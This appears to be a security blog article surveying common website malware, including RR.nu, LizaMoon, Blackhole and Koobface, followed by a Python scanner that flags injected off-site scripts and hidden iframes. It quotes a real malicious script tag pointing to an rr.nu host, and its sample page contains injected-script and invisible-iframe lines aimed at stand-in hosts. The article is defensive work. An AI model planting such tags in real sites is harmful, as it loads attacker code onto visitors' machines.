It used to be that malware was spread through sharing floppy disks. The threat eventually moved on to USB drives, email and file-sharing downloads. Nowadays, the threats are so advanced that simply visiting a web site that contains malicious code can cause your computer to be infected.
Below, you will see a few examples of the most common types of malware that infect seemingly innocent web sites all over the world.
This is the malware that infected Leo Laporte’s TWiT.tv site. When people visited his site they were redirected to another web page with a cz.cc domain name that runs a file named woms.jar which infects the victim’s computer with Trojans that install fake anti-virus warnings and/or trigger a PDF vulnerability.
This malware targeted e-commerce sites running osCommerce, and in under two weeks it was able to go from 90,000 known infections to over 6 million. The code allows attackers to exploit vulnerabilities in osCommerce and places an invisible iFrame on the page. When victims visit infected pages, their computers are attacked through vulnerabilities in Java, Adobe Reader, Windows Help Center and Internet Explorer. We blogged about the “Willysy Injection Attacks” a while ago.
The name may seem a bit funny but the end result is not. This code is placed in a web site’s PHP files and causes the victim to be redirected to another site when the host page is accessed through a search engine. The attacker can then use the redirected site to infect the visitor’s computer.
Facebook and MySpace were among the social networks where Koobface ran free. Fake messages and comments from “friends” would be placed on a page. When victims clicked on the link to view a video, they would be prompted to download an update, usually a codec, that would actually install malware allowing attackers to control the infected computer. Read more about “Koobface Malware Detection” in our other blog article.
Hacked sites found to contain the script <script src="http://trill18ionsa.rr.nu/pmg.php?dr=1"></script> were infected with the RR.nu malware. Visitors to infected sites were redirected to a fake virus-scan website where they were tricked into paying for a bogus service while divulging credit card information. For more information on the RR.nu malware, read our blog article “How to Deal with the Latest WordPress Outbreak?”
Using fake HTML forms injected into online banking login pages, this malware allows the attacker to steal all sorts of information from the victim, including account numbers, user names, passwords and credit card numbers. Read also “A trojan which steals your money ‘intelligently’”.
This SQL injection attack spread scareware to over 1.5 million computers between March and April of 2011. Infected users were coerced into installing “anti-virus software” that was actually nothing more than a rogue application called Windows Stability Center. You can find more information about the LizaMoon malware in our articles “LizaMoon Hack: Mass SQL Injection” and “It’s LizaMoon All Over Again”.
Using PHP code created with the Blackhole Toolkit, the attackers were able to place an iFrame on sites that sends visitors an executable file containing whatever payload the attacker desires. Some high-profile sites that were attacked with this malware include Cryptome.org, the government of Mexico, the State of Alabama, Ticketmaster and Microsoft’s store in India. We talked about the Blackhole Toolkit in “BlackHole Toolkit: Malware Running Wild”.
One of the biggest reasons people flock to Apple products is because they are under the impression that their computer cannot be infected with malware since it is a Mac. Not true. Flashback is one of the latest password-stealing programs aimed at Apple fanboys. By tricking users into updating or installing Adobe Flash Player, the code exploits a vulnerability in Java and then goes on to steal the victim’s passwords.
WordPress has made it easy for anyone to get a web site up and running. But it has also made it easier for attackers to infect even more sites than they ever thought possible. This Trojan is one of the more recent pieces of malware to infect sites running WordPress. Visitors to infected sites would find that they had downloaded malware that infects their own computers as well.
If you find this article interesting, you may also want to check out the blog article “What is Malware? And How is Web-Malware Different?”
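Several of the infections above leave a mark in the HTML a site serves: the invisible iFrame of the osCommerce and Blackhole cases and the injected script tag of the RR.nu case. The following check for site owners is an added example, not code from the original article; the class and function names, the site host shop.example and all host names in the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

# Constructed sample page for a site assumed to live at shop.example.
SAMPLE = """<html><body>
<script src="/js/cart.js"></script>
<script src="//static.shop.example/app.js"></script>
<script src="http://injected.example/pmg.php?dr=1"></script>
<iframe src="http://video.example/embed/1" width="560" height="315"></iframe>
<iframe src="http://kit.example/in.php" width="1" height="1"></iframe>
<iframe src="http://kit.example/in.php" style="visibility: hidden"></iframe>
</body></html>"""

class InjectionScanner(HTMLParser):
    """Records off-site <script src> tags and invisible off-site <iframe> tags."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (reason, host, line number)

    def _off_site_host(self, url):
        host = (urlparse(url.strip()).hostname or "").lower()
        # Relative URLs have no host; the site and its subdomains are trusted.
        if not host or host == self.site_host or host.endswith("." + self.site_host):
            return None
        return host

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = {k: (v or "") for k, v in attrs}
        host = self._off_site_host(a.get("src", ""))
        if host is None:
            return
        tiny = any(a.get(k, "").strip() in ("0", "1", "0px", "1px") for k in ("width", "height"))
        if tag == "script":
            self.findings.append(("external-script", host, self.getpos()[0]))
        elif tiny or HIDDEN_STYLE.search(a.get("style", "")):
            self.findings.append(("hidden-iframe", host, self.getpos()[0]))

def scan(html, site_host):
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    return scanner.findings
```

An empty result only covers the static markup that was scanned: the redirect that fires when a page is reached through a search engine sits in the site's PHP files, so it has to be looked for in the files on the server.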